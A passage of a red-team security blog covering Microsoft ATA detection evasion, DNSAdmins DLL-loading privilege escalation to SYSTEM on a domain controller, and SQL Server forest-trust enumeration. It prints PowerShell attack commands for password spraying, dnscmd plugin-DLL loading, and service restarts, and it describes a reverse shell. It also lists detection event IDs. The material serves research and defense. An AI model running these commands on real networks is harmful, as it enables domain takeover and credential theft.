<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfmQfzA3QpZ3EREiA0Q31b7xjwLWZ6lzjZ4msIDo3_wj1p8cJ_iR0PIll3OeRBQ0qvITyuxbZ-MxZ4T0GwwglHF_TPaMVQ9A4ntBSPB9Wi_NGW51EvA9KY3_nhyphenhyphenf1ci6uqeou8FjuKcs/s1600/Enumeration-TempDA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="381" data-original-width="1177" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfmQfzA3QpZ3EREiA0Q31b7xjwLWZ6lzjZ4msIDo3_wj1p8cJ_iR0PIll3OeRBQ0qvITyuxbZ-MxZ4T0GwwglHF_TPaMVQ9A4ntBSPB9Wi_NGW51EvA9KY3_nhyphenhyphenf1ci6uqeou8FjuKcs/s400/Enumeration-TempDA.png" width="400" /></a></div>
<span style="text-align: justify;">And above will not be detected by ATA! A simple but effective bypass ;) As long as we keep our communication with the DC minimum, chances of detection would be low.</span><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Another enumeration technique, not caught by ATA right now, is using SPN scanning. Read <a href="https://technet.microsoft.com/en-us/library/cc961723.aspx">this article</a> to know more about SPNs. We will touch SPN scanning on Day 4.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-NetUser -SPN </textarea></pre>
<br />
<b>Brute-Force</b><br />
<div style="text-align: justify;">
Once we know a machine where token of a DA is available, we may like to have local admin access to it so as to possibly extract credentials (hashes, keys or passwords) for the DA and use that. There are so many ways to achieve it. Since we already have a list of users, let's try brute-force attack against all the users in the domain. This is how a detection looks like:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-XQCSqC_H-TRcFfVUKRym3G9yHfalS1cjEdcd2Jx71VdZmamDmyYrGXJrFlMcOCX1gZjBxelMRMmbDfTH4WAVyl_UqeAfjp0kATa2Qin69QPOaBrVpQK6lmo830kpyg2hbnbLLBVkjFE/s1600/Brute-Force-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="1223" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-XQCSqC_H-TRcFfVUKRym3G9yHfalS1cjEdcd2Jx71VdZmamDmyYrGXJrFlMcOCX1gZjBxelMRMmbDfTH4WAVyl_UqeAfjp0kATa2Qin69QPOaBrVpQK6lmo830kpyg2hbnbLLBVkjFE/s400/Brute-Force-Detection.png" width="400" /></a></div>
<br />
We will use only one password and therefore, a single attempt against all the users. This is a <a href="http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html">well known technique</a>. We will use Invoke-BruteForce from Nishang for this:<br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-BruteForce -ComputerName 192.168.0.1 -UserList .\users.txt -PasswordList .\pass.txt -Verbose -Service ActiveDirectory</textarea></pre>
<br />
<span style="text-align: justify;">And this doesn't get detected! I have another brute-force bypass under research and I will present that during </span><a href="http://2017.brucon.org/index.php/Evading_Microsoft_ATA_for_Active_Directory_Domination" style="text-align: justify;">my talk at BruCON</a><span style="text-align: justify;">.</span><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Once we have local admin credentials (brute-force) or access (Find-LocalAdminAccess) to the box where DA tokens are available, we will pull the credentials for DA. That will be covered on Day 2 :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Hope you enjoyed the post!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The slides of the BlackHat talk are below:</div>
<a href="https://www.slideshare.net/nikhil_mittal/evading-microsoft-ata-for-active-directory-domination">https://www.slideshare.net/nikhil_mittal/evading-microsoft-ata-for-active-directory-domination</a><br />
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/CPVefdo7ljPbKc" style="border-width: 1px; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/nikhil_mittal/evading-microsoft-ata-for-active-directory-domination" target="_blank" title="Evading Microsoft ATA for Active Directory Domination">Evading Microsoft ATA for Active Directory Domination</a> </strong> from <strong><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></strong> </div>
<br />
<br />
<br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com1tag:blogger.com,1999:blog-8135211063584500909.post-21954863298372213992017-05-10T00:54:00.002+05:302021-12-08T12:22:49.963+05:30Abusing DNSAdmins privilege for escalation in Active Directory<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">UPDATE (November 2021) - After more than 4 years, Microsoft has acknowledged this is as a vulnerability and released a patch. This is now <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40469">CVE-2021-40469</a>!<br /></div><div style="text-align: justify;"> </div><div style="text-align: justify;">Yesterday, I read <a href="https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83">this awesome post by Shay Ber here</a> which details a feature abuse in Windows Active Directory (AD) environment. I rely heavily on feature abuse during my red team engagements and always recommend them over memory corruption exploits during my training as well. Feature abuses are as lethal as exploits and are almost always ignored.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The post details a feature abuse in AD where a user who is member of the DNSAdmins group or have write privileges to a DNS server object can load an arbitrary DLL with SYSTEM privileges on the DNS server. Since, many enterprise setups use the Domain Controller (DC) as a DNS server as well, this is a very interesting find. Let's try to see the practical usage of this feature.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This is the lab setup. We have initial access as a normal domain user (labuser) on one of the boxes in our lab AD.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7uuoQsPCMSiMvT_apgbKCyb8FAO47y20A5OnL86v9AWhAmlUkQg8j6cyKAu6VW4xFeZ-nBUvbREkyHo4d-jVcDWhMmeY4vbd3sdcJHCqa1v6gVGcdt0kz4oto5Eu58U-9FgjdIsmXcrA/s1600/blog.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7uuoQsPCMSiMvT_apgbKCyb8FAO47y20A5OnL86v9AWhAmlUkQg8j6cyKAu6VW4xFeZ-nBUvbREkyHo4d-jVcDWhMmeY4vbd3sdcJHCqa1v6gVGcdt0kz4oto5Eu58U-9FgjdIsmXcrA/s400/blog.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Let's first enumerate users who are part of the DNSAdmins group using PowerView.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-NetGroupMember -GroupName "DNSAdmins"
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSg4-pEeIkiLlac-ZUcUI2_6PWhFw_zKrNvOlo5tAT_tMchqmXKL4tkdx4U41sr8fwhlDSB3WvbF7AUFz9pRqH_PWraVYdcj9QOvvJ58qnuw2hKe1KLXwk0PyZ1UhotAWa7YxJZcm3teA/s1600/enumerate-powerview.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSg4-pEeIkiLlac-ZUcUI2_6PWhFw_zKrNvOlo5tAT_tMchqmXKL4tkdx4U41sr8fwhlDSB3WvbF7AUFz9pRqH_PWraVYdcj9QOvvJ58qnuw2hKe1KLXwk0PyZ1UhotAWa7YxJZcm3teA/s400/enumerate-powerview.jpg" width="400" /></a></div>
<div style="text-align: justify;">
In a real red team or pentest, the next step would be to target the buildadmin user. We can find a box where token of buildadmin is available using Invoke-UserHunter from PowerView.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-UserHunter -UserName buildadmin
</textarea></pre>
<div style="text-align: justify;">
To keep the discussion on the topic at hand, let's assume that we found a box where a ticket of buildadmin is available and our current user (labuser) has local admin access as well (derivative admin). So, we have privileges of the user who is a member of the DNSAdmins group.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, there could be two scenarios - one where the DC is the DNS server as well and second, where a separate server acts as the DNS server.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For the first scenario, where the DNS Server service is running on the DC we can simply use dnscmd as mentioned in the post by Shay to load a dll. There is also a PowerShell module - dnsserver - for this but it is not well documented.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<strike>Before we discuss the dll to be used, there is a catch which the above referenced post didn't address. If we have a look at the <a href="https://msdn.microsoft.com/en-us/library/cc448821.aspx">MS-DNSP protocol specification</a>, the ServerLevelPluginDll needs an absolute pathname. That means, it is not possible to load a DLL from a UNC path. We must load the DLL from the local machine. I tried UNC paths, HTTP etc. without any success. This actually spoils the attack to much extent as we will need <b>write privileges on the DC</b> :/ I actually though of not writing this post after discovering this but decided to write it anyway so that others do not spend time looking for the same thing. Also, that is how one learns :)</strike> I will be glad if someone smarter than me finds out a way to do this remotely.<br />
<br />
<b>UPDATE: Benjamin <a href="https://twitter.com/gentilkiwi/status/862038363829919744">confirmed</a> that it is possible to load the DLL from UNC path. The 'C$' in my UNC path was the problem! </b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We can use the below command to load the DLL. The path \\ops-build\dll should be readable by the DC:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> dnscmd ops_dc /config /serverlevelplugindll \\ops-build\dll\mimilib.dll
</textarea></pre>
<div style="text-align: justify;">
For debugging (admin rights required on the target), below command can be used to check if DLL was added successfully on the target</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
</textarea></pre>
<br />
<div style="text-align: justify;">
Now, since our user is a part of the DNSAdmins, we can restart the DNS service. While, this is NOT the default configuration, it makes sense for such a user to have the rights to restart the DNS service. <strike>But, the service restart must be done from the local box, that is, DC in the current scenario. We need administrator rights to do it remotely - the attack gets more typical and hard to execute :(</strike></div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: black; color: white;">C:\> sc \\ops-dc stop dns
C:\> sc \\ops-dc start dns
</textarea></pre>
<br />
<div style="text-align: justify;">
So what do we get after successfully executing the above commands? Benjamin quickly updated mimilib to be used with this attack. The updated version of <a href="https://github.com/gentilkiwi/mimikatz/blob/master/mimilib">mimilib</a> when used in this attack logs all DNS queries to C:\Windows\system32\kiwidns.log</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpU-FOsuf4rp973lnjteyQ85txqPLucDYwgAeVH-wdhBseMrfmBGebm-fQbYTQdSPZU1hsWGhprwSdDlpMQvtn5ex0Gdzhl_80wjGXv0tMZFE19SBLbdN5jYqgcab7B7Hvr7N42i8YE8M/s1600/kiwidns.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpU-FOsuf4rp973lnjteyQ85txqPLucDYwgAeVH-wdhBseMrfmBGebm-fQbYTQdSPZU1hsWGhprwSdDlpMQvtn5ex0Gdzhl_80wjGXv0tMZFE19SBLbdN5jYqgcab7B7Hvr7N42i8YE8M/s400/kiwidns.jpg" width="400" /></a></div>
<div style="text-align: justify;">
We can make changes to <a href="https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c">kdns.c</a> to include capability of command execution. I included a simple line of code to execute <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1">a reverse PowerShell shell</a> encoded using Invoke-Encode from Nishang. The payload gets executed for each query to the DNS service and the kiwidns.log will still be created and populated.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_9fVhYgrC12Pi93bH6SgNvDd-sBC4xQyrtMA37okyJeVGebTmMPrU4I3ACWFFR8Drd3ogkXnwqYL9w83aZfCo_zJFWnpxdSSl7AsOKAL6Dg3WAVUpoRhaWWKEpkidYlKhUBJ-vCy4C0/s1600/dc_execution.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_9fVhYgrC12Pi93bH6SgNvDd-sBC4xQyrtMA37okyJeVGebTmMPrU4I3ACWFFR8Drd3ogkXnwqYL9w83aZfCo_zJFWnpxdSSl7AsOKAL6Dg3WAVUpoRhaWWKEpkidYlKhUBJ-vCy4C0/s400/dc_execution.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
On our listener:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbn5AYBDHMZDr96DwOMTPNNDIbkYIzd0w6YjVX11cNrFiy0GBA5My7OjBrt42klAAoDohy1k9-9WbEjjwQ295n-5fH77Ai9DXxJy_9dZhgCOq1W9uqwt2_7ex90Cnxq9EnOyM_oSZcvbM/s1600/system_dc.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbn5AYBDHMZDr96DwOMTPNNDIbkYIzd0w6YjVX11cNrFiy0GBA5My7OjBrt42klAAoDohy1k9-9WbEjjwQ295n-5fH77Ai9DXxJy_9dZhgCOq1W9uqwt2_7ex90Cnxq9EnOyM_oSZcvbM/s400/system_dc.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Neat! SYSTEM on the domain controller. We own this domain and possibly the entire forest :D</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For our second scenario, if DNS service was not running on the DC we can still get SYSTEM access on the box with 'only' the privileges of DNSAdmins and restarting the DNS service. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>How to detect the attack? </b></div>
<div style="text-align: justify;">
<br />
To prevent the attack, audit ACL for write privilege to DNS server object and membership of DNSAdmins group. <br />
<br />
Obvious indicators like DNS service restart and couple of log entries:</div>
<div style="text-align: justify;">
DNS Server Log Event ID 150 for failure and 770 for success</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pxNKhucIGerEQx9AMr68ExE2P5JeHPw63JFUtkn_FiKXmjZa4Z4yp6MrekSMSwY2OSx6wr249l6M_qbP4GItKXdsyM66meaejIKMZefJBdjpZC1TDdvUKzOSoZE6DFlR5UB1vSlWjjo/s1600/event150.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pxNKhucIGerEQx9AMr68ExE2P5JeHPw63JFUtkn_FiKXmjZa4Z4yp6MrekSMSwY2OSx6wr249l6M_qbP4GItKXdsyM66meaejIKMZefJBdjpZC1TDdvUKzOSoZE6DFlR5UB1vSlWjjo/s400/event150.jpg" width="400" /></a></div>
<span id="goog_95562755"></span><span id="goog_95562756"></span><br />
<span id="goog_95562755"></span><span id="goog_95562756"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrp3xMXPo8xnD_lZbwgk4qyWPAtLq69zp8PClTgDwypzO5YqQD0C8c0JVAAzBklX_NJn669qJ9zBKpXERmBlP3K8MiVbF_KL2HPNJFDobcoH06yzkKr-3AIuHanHsf0lEOtls0qsWAeY/s1600/event770.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrp3xMXPo8xnD_lZbwgk4qyWPAtLq69zp8PClTgDwypzO5YqQD0C8c0JVAAzBklX_NJn669qJ9zBKpXERmBlP3K8MiVbF_KL2HPNJFDobcoH06yzkKr-3AIuHanHsf0lEOtls0qsWAeY/s400/event770.jpg" width="400" /></a></div>
<span id="goog_95562755"></span><span id="goog_95562756"></span>Microsoft-Windows-DNS-Server/Audit Log Event ID 541 for both success and failure. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguq93EtZFhGTCquf_OUOM5pUBr8WRhaEBCyZTYE-B63iHcwhiEA-sUhOqoAfLNA-ga9zqYsB-sf8zbYCD1xT3HankxY_NjJ82Ylltm0acSIUSCbEh5R1daZrjgtLhd1u0BnKFhM2ST5Mg/s1600/event541.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguq93EtZFhGTCquf_OUOM5pUBr8WRhaEBCyZTYE-B63iHcwhiEA-sUhOqoAfLNA-ga9zqYsB-sf8zbYCD1xT3HankxY_NjJ82Ylltm0acSIUSCbEh5R1daZrjgtLhd1u0BnKFhM2ST5Mg/s400/event541.jpg" width="400" /></a></div>
Monitoring changes to HKLM:\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll will also help.<br />
<br />
<br />
Hope you liked the post. Please leave feedback and comments. <br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-71919062185349380482017-03-23T13:52:00.000+05:302018-01-14T22:48:15.073+05:30Using SQL Server for attacking a Forest Trust<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
Recently I started playing with the awesome <a href="https://github.com/NetSPI/PowerUpSQL">PowerUpSQL</a> tool by guys at <a href="https://blog.netspi.com/powerupsql-powershell-toolkit-attacking-sql-server/">NetSPI</a>. I was interested in the ability to attack an Active Directory (AD) environment using access to a SQL Server, that is, not leaving the database layer as long as possible. Fortunately, during a Red team engagement few weeks back, I had a chance to play with PowerUpSQL extensively. Turns out that it is very much possible to enumerate and attack not only the current domain but a trusting forest in a <a href="https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx">Two-Way External Trust</a> as well from the database layer. Let's have a look at it!</div>
<br />
<b>Network Diagram</b><br />
<div style="text-align: justify;">
I have mapped the client network to my lab on a much smaller scale. We have access to the SQL Server ops-sqlsrvone where we have public privileges<span style="color: #0000ee;"> and can communicate to only selected machines on the d<span style="color: #0000ee;">efensiveps.com forest. </span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6TVzxMK_l8iOWo_xdsM4_WUIfae-PCwJYqU2cxaQit_lGVr9HrBUsR7anQ0CzJE4jp_A6XgxMnVfOyosk4zW7IjDjcWb8N8wfSuvDJBPQPQegtpz1nuDrlyHBd6E1qkD4XbXuB-5MdUE/s1600/Diag_Final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6TVzxMK_l8iOWo_xdsM4_WUIfae-PCwJYqU2cxaQit_lGVr9HrBUsR7anQ0CzJE4jp_A6XgxMnVfOyosk4zW7IjDjcWb8N8wfSuvDJBPQPQegtpz1nuDrlyHBd6E1qkD4XbXuB-5MdUE/s400/Diag_Final.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Cross Forest Enumeration</b> <br />
<div style="text-align: justify;">
It is possible to enumerate the current domain accounts using PowerUpSQL using interesting <a href="https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/">fuzzing methods</a>. In our lab setup we know that there is a trust relationship from offensiveps with a forest called defensiveps (we can use PowerView, netdom or Get-ADTrust). But PowerUpSQL does not provide a way of specifying an alternate domain to enumerate accounts. We can change a single variable in the code to use an alternate domain. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIFHD8uSbin-XDsjLVzGsxhZJzqQYRvFLYDgR7u-g2JdZsWXb_Tlmga2BVBobWT0CIbBSpz7KXUgkocAp7xeuqeqMQ9XFo4RGO3QCJSDNOddHco2IKItk6EL8GJNBJrjwpN1RsRbdIXUw/s1600/Alternate_Domain.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIFHD8uSbin-XDsjLVzGsxhZJzqQYRvFLYDgR7u-g2JdZsWXb_Tlmga2BVBobWT0CIbBSpz7KXUgkocAp7xeuqeqMQ9XFo4RGO3QCJSDNOddHco2IKItk6EL8GJNBJrjwpN1RsRbdIXUw/s400/Alternate_Domain.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Now, it is possible to enumerate interesting information from the target domain which is in a different forest.<b> </b>After modifying the value of $Domain variable, import the PowerUpSQL module and run the below command:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLFuzzDomainAccount -Instance ops-sqlsrvone -StartId 500 -EndId 5000
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqXGgEpfqG4ArbpAWdIsPtb17t64rMjzyPOs2gvsZYchCwMx3SR2OKjoQGgze3HGuwa-6pt2euUbo6qEnbhUqU-mDUFZ2oXi5TJDXFY8sSysgo6rpZhjif3iu_ESbhBXt4Rlbc_Zwt9YY/s1600/User_Enumeration.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqXGgEpfqG4ArbpAWdIsPtb17t64rMjzyPOs2gvsZYchCwMx3SR2OKjoQGgze3HGuwa-6pt2euUbo6qEnbhUqU-mDUFZ2oXi5TJDXFY8sSysgo6rpZhjif3iu_ESbhBXt4Rlbc_Zwt9YY/s400/User_Enumeration.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Neat! We got a list of target domain's users, groups, computers etc.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The enumeration done above helped in listing SQL Servers in the defensiveps domain. Now, mimicking the network I encountered during the assessment, it is possible to access only dps-sqlsrvdev, couple of DCs and some terminal servers in the defensiveps network directly. So, let's enumerate dps-sqlsrvdev:</div>
<br />
<b>Database logins</b><br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLFuzzServerLogin -Instance dps-sqlsrvdev
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiFfnV7d40y-2PT_2vldeKN0R7i0Zo7AYlEyxoNZ1lPJn1WQ6RdysUBg2bkHWsEMsBXH3GkOD9guHgrLrtrrsEI9PH5LX5-bUkyNRZcWKSvNa-PUZwg54pSYxOFs5R3J3sMl1z8jTFkBk/s1600/enumerate_dps-sqlsrvone.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiFfnV7d40y-2PT_2vldeKN0R7i0Zo7AYlEyxoNZ1lPJn1WQ6RdysUBg2bkHWsEMsBXH3GkOD9guHgrLrtrrsEI9PH5LX5-bUkyNRZcWKSvNa-PUZwg54pSYxOFs5R3J3sMl1z8jTFkBk/s400/enumerate_dps-sqlsrvone.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Note that our current user is listed as a login above and that is why it is possible to enumerate the above. Let's check the current privileges we have:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLServerInfo -Instance dps-sqlsrvdev
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPheTJY3ITWprk6pxCqyGMt4MPoLo9sLJS6qvZj-W7WyJaoQiNIsffbFLOsxtfp2bPFSAStZ-MCAZwZqEe9CTrXhrtxGfy_f3pC5u-ZlkBElBo8K-3zthZ4Nzv7d8RGgPAQmq84OHUHtE/s1600/privs_dps_sqlsrvdev.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPheTJY3ITWprk6pxCqyGMt4MPoLo9sLJS6qvZj-W7WyJaoQiNIsffbFLOsxtfp2bPFSAStZ-MCAZwZqEe9CTrXhrtxGfy_f3pC5u-ZlkBElBo8K-3zthZ4Nzv7d8RGgPAQmq84OHUHtE/s400/privs_dps_sqlsrvdev.jpg" width="400" /></a></div>
<div style="text-align: justify;">
No sysadmin privileges. We can check it manually as well (I am using HeidiSQL as a client):</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cLN63Yo8uUOs-mVqnims_Dw98jUqxMXX6dvcBKNsuNt5PmUUOcQkZZr7WuA7CmCQ0O5-6MYRll6Dj9oq_ha1V08dfsRIT1Pah7lA9ARj_tfMPWwgprYWjaKddmSx2REAmckLDXuDuxo/s1600/privs_heidi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cLN63Yo8uUOs-mVqnims_Dw98jUqxMXX6dvcBKNsuNt5PmUUOcQkZZr7WuA7CmCQ0O5-6MYRll6Dj9oq_ha1V08dfsRIT1Pah7lA9ARj_tfMPWwgprYWjaKddmSx2REAmckLDXuDuxo/s400/privs_heidi.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
We can go ahead with a brute-force attack as there are some interesting SQL server logins and generally, account lockouts are not enabled in SQL Server databases and nobody really looks at the logs of authentication failure in SQL Server, at least, on non-production servers. But we are not going to do that right now. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Linked Servers </b></div>
<div style="text-align: justify;">
We can also enumerate linked servers for dps-sqlsrvdev. Let's do it:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-SQLServerLink -Instance dps-sqlsrvdev
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSfLgytAlFQO2wN_o2JjJQXglkE6VFshdQWl7MMb4pFRwEghM_quSsfB83OjsSntDZa04Q9TVldbTS0H6fpMpcR6ajeqZfkct7j5qEzqHksS_XlthaSCR3xqPLuyJ83kwQmF6emBifBpo/s1600/linked_dps-sqlsrvdev.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSfLgytAlFQO2wN_o2JjJQXglkE6VFshdQWl7MMb4pFRwEghM_quSsfB83OjsSntDZa04Q9TVldbTS0H6fpMpcR6ajeqZfkct7j5qEzqHksS_XlthaSCR3xqPLuyJ83kwQmF6emBifBpo/s400/linked_dps-sqlsrvdev.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Nice! A server, dps-sqlsrvtwo, in the defensiveps domain - which we enumerated earlier as well - is linked to the current database. Note that it is possible to run arbitrary SQL queries on the linked database even if we have only public privileges on both the initial and destination servers with the privileges configured in the link. Read more about hacking SQL Server links in the <a href="https://blog.netspi.com/how-to-hack-database-links-in-sql-server/">amazing blog by Antti</a>. Link enumeration can be done manually as well:</div>
<pre><textarea cols="70" readonly="readonly" rows="1">select * from master..sysservers
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-wOWiyL0p-w9SupDRtN7tC1wlLNSpTjd-oUbVadJCXFjjaIDTq39p-d8FMrVuqGSBAe8uRuCFt8rPkN5Dm66mwEskncfOaYOTyaia-p5VfV5iS899uNKT12EpP8bFG1UhuRxsk_8kguE/s1600/linked_heidi_dps-sqlsrvdev.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-wOWiyL0p-w9SupDRtN7tC1wlLNSpTjd-oUbVadJCXFjjaIDTq39p-d8FMrVuqGSBAe8uRuCFt8rPkN5Dm66mwEskncfOaYOTyaia-p5VfV5iS899uNKT12EpP8bFG1UhuRxsk_8kguE/s400/linked_heidi_dps-sqlsrvdev.jpg" width="400" /></a></div>
<div style="text-align: justify;">
So, dps-sqlsrvdev has a linked server dps-sqlsrvtwo.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
